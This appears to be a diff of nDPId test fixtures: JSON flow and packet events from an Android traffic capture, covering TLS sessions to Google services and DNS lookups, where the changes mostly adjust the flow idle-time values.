-00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1582454868386,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868386,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8PjQAAHUGg6ys2RRKwKgCEAG7zQbWjo3E26s3cKAS6yAJ1AAAAgQFZAQCCAq9hJee\/\/80GgEDAwg="} 
-00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1582454868386,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454868386,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0A3ZAAEAGs3LAqAIQrNkUSs0GAbvbqzdw1o6NxYAQAVciEQAAAQEICv\/\/NCS9hJee"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454868348,"flow_last_seen":1582454868424,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1582454868424,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.googleapis.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454867688,"flow_last_seen":1582454867788,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1584,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1582454867788,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying 
HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"clients1.google.com","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"b31c0b82752ea0e2c48b8ce46e9263e5","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}} +02356{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454867688,"flow_last_seen":1582454867789,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3887,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1582454867789,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"clients1.google.com","server_names":"*.google.com,*.android.com,*.appengine.google.com,*.cloud.google.com,*.crowdsource.google.com,*.g.co,*.gcp.gvt2.com,*.gcpcdn.gvt1.com,*.ggpht.cn,*.gkecnapps.cn,*.google-analytics.com,*.google.ca,*.google.cl,*.google.co.in,*.google.co.jp,*.google.co.uk,*.google.com.ar,*.google.com.au,*.google.com.br,*.google.com.co,*.google.com.mx,*.google.com.tr,*.google.com.vn,*.google.de,*.google.es,*.google.fr,*.google.hu,*.google.it,*.google.nl,*.google.pl,*.google.pt,*.googleadapis.com,*.googleapis.cn,*.googlecnapps.cn,*.googlecommerce.com,*.googlevideo.com,*.gstatic.cn,*.gstatic.com,*.gstaticcnapps.cn,*.gvt1.com,*.gvt2.com,*.metric.gstatic.com,*.urchin.com,*.url.google.com,*.wear.gkecnapps.cn,*.youtube-nocookie.com,*.youtube.com,*.youtubeeducation.com,*.youtubekids.com,*.yt.be,*.ytimg.com,android.clients.google.com,android.com,developer.android.google.cn,developers.android.google.cn,g.co,ggpht.cn,gkecnapps.cn,goo.gl,google-analytics.com,google.com,googlecnapps.cn,googlecommerce.com,source.android.google.cn,urchin.com,www.goo.gl,youtu.be,youtube.com,youtubeeducation.com,youtubekids.com,yt.be","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"b31c0b82752ea0e2c48b8ce46e9263e5","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google.com","fingerprint":"80:50:28:F4:84:F5:C4:C6:41:DE:75:67:38:C4:A6:E2:59:FF:75:42"}} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":123,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868348,"flow_last_seen":1582454868348,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454868348,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1582454868348,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868348,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8A3VAAEAGs2vAqAIQrNkUSs0GAbvbqzdvAAAAAKAC\/\/+uLAAAAgQFtAQCCAr\/\/zQaAAAAAAEDAwg="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1582454868386,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868386,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8PjQAAHUGg6ys2RRKwKgCEAG7zQbWjo3E26s3cKAS6yAJ1AAAAgQFZAQCCAq9hJee\/\/80GgEDAwg="} 
+00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1582454868386,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454868386,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0A3ZAAEAGs3LAqAIQrNkUSs0GAbvbqzdw1o6NxYAQAVciEQAAAQEICv\/\/NCS9hJee"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454868348,"flow_last_seen":1582454868424,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1582454868424,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.googleapis.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":128,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868462,"flow_last_seen":1582454868462,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1582454868462,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":47081,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1582454868462,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1582454868462,"pkt":"xiwDYGpkTGr2n\/YnCABFAABLqjFAAEARCw\/AqAIQwKgCAbfpADUAN\/8RnJ4BAAABAAAAAAAAEWNvbm5lY3Rpdml0eWNoZWNrB2dzdGF0aWMDY29tAAABAAE="} 00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868462,"flow_last_seen":1582454868462,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1582454868462,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":47081,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.gstatic.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":129,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454868348,"flow_last_seen":1582454868466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1603,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1582454868466,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"play.googleapis.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -01590{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":131,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454868348,"flow_last_seen":1582454868466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3177,"flow_avg_l4_payload_len":397,"midstream":0,"thread_ts_msec":1582454868466,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.googleapis.com","server_names":"*.storage.googleapis.com,*.appspot.com.storage.googleapis.com,*.commondatastorage.googleapis.com,*.content-storage-download.googleapis.com,*.content-storage-upload.googleapis.com,*.content-storage.googleapis.com,*.googleapis.com,*.storage-download.googleapis.com,*.storage-upload.googleapis.com,*.storage.select.googleapis.com,commondatastorage.googleapis.com,storage.googleapis.com,storage.select.googleapis.com,unfiltered.news","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.storage.googleapis.com","alpn":"http\/1.1","fingerprint":"BA:BA:BA:55:69:9F:E0:BD:48:80:23:A4:B3:AD:C1:FF:EA:4E:17:C9"}} 
+00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":129,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454868348,"flow_last_seen":1582454868466,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1603,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1582454868466,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.googleapis.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +01590{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":131,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454868348,"flow_last_seen":1582454868466,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3177,"flow_avg_l4_payload_len":397,"midstream":0,"thread_ts_msec":1582454868466,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"play.googleapis.com","server_names":"*.storage.googleapis.com,*.appspot.com.storage.googleapis.com,*.commondatastorage.googleapis.com,*.content-storage-download.googleapis.com,*.content-storage-upload.googleapis.com,*.content-storage.googleapis.com,*.googleapis.com,*.storage-download.googleapis.com,*.storage-upload.googleapis.com,*.storage.select.googleapis.com,commondatastorage.googleapis.com,storage.googleapis.com,storage.select.googleapis.com,unfiltered.news","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.storage.googleapis.com","alpn":"http\/1.1","fingerprint":"BA:BA:BA:55:69:9F:E0:BD:48:80:23:A4:B3:AD:C1:FF:EA:4E:17:C9"}} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1582454868503,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1582454868503,"pkt":"TGr2n\/YnxiwDYGpkCABFAABbmZAAAEARW6DAqAIBwKgCEAA1t+kAR93wnJ6BgAABAAEAAAAAEWNvbm5lY3Rpdml0eWNoZWNrB2dzdGF0aWMDY29tAAABAAHADAABAAEAAACxAASs2RID"} 
00804{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":135,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454868462,"flow_last_seen":1582454868503,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1582454868503,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":47081,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.gstatic.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.18.3"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868511,"flow_last_seen":1582454868511,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454868511,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1582454868511,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868511,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8PG9AAEAGfLjAqAIQrNkSA5AYAbuCdQgsAAAAAKAC\/\/91sgAAAgQFtAQCCAr\/\/zRDAAAAAAEDAwg="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868527,"flow_last_seen":1582454868527,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454868527,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1582454868527,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868527,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8stVAAEAGBlLAqAIQrNkSA5AaAbtdpoaTAAAAAKAC\/\/8cFQAAAgQFtAQCCAr\/\/zRGAAAAAAEDAwg="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1582454868559,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868559,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8mn0AAHYGKKqs2RIDwKgCEAG7kBpu4mZiXaaGlKAS6yC\/LgAAAgQFZAQCCApPRk15\/\/80RgEDAwg="} 
-00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1582454868563,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454868563,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0stZAAEAGBlnAqAIQrNkSA5AaAbtdpoaUbuJmY4AQAVfXbAAAAQEICv\/\/NE9PRk15"} -00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":140,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454868527,"flow_last_seen":1582454868563,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454868563,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868511,"flow_last_seen":1582454868511,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454868511,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1582454868511,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868511,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8PG9AAEAGfLjAqAIQrNkSA5AYAbuCdQgsAAAAAKAC\/\/91sgAAAgQFtAQCCAr\/\/zRDAAAAAAEDAwg="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868527,"flow_last_seen":1582454868527,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454868527,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1582454868527,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868527,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8stVAAEAGBlLAqAIQrNkSA5AaAbtdpoaTAAAAAKAC\/\/8cFQAAAgQFtAQCCAr\/\/zRGAAAAAAEDAwg="} 
+00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1582454868559,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868559,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8mn0AAHYGKKqs2RIDwKgCEAG7kBpu4mZiXaaGlKAS6yC\/LgAAAgQFZAQCCApPRk15\/\/80RgEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1582454868563,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454868563,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0stZAAEAGBlnAqAIQrNkSA5AaAbtdpoaUbuJmY4AQAVfXbAAAAQEICv\/\/NE9PRk15"} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":140,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454868527,"flow_last_seen":1582454868563,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454868563,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":142,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868597,"flow_last_seen":1582454868597,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454868597,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":51430,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1582454868597,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454868597,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBqkFAAEARCwnAqAIQwKgCAcjmADUALYwU2tsBAAABAAAAAAAAD2FwcC1tZWFzdXJlbWVudANjb20AAAEAAQ=="} 00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868597,"flow_last_seen":1582454868597,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454868597,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":51430,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"app-measurement.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
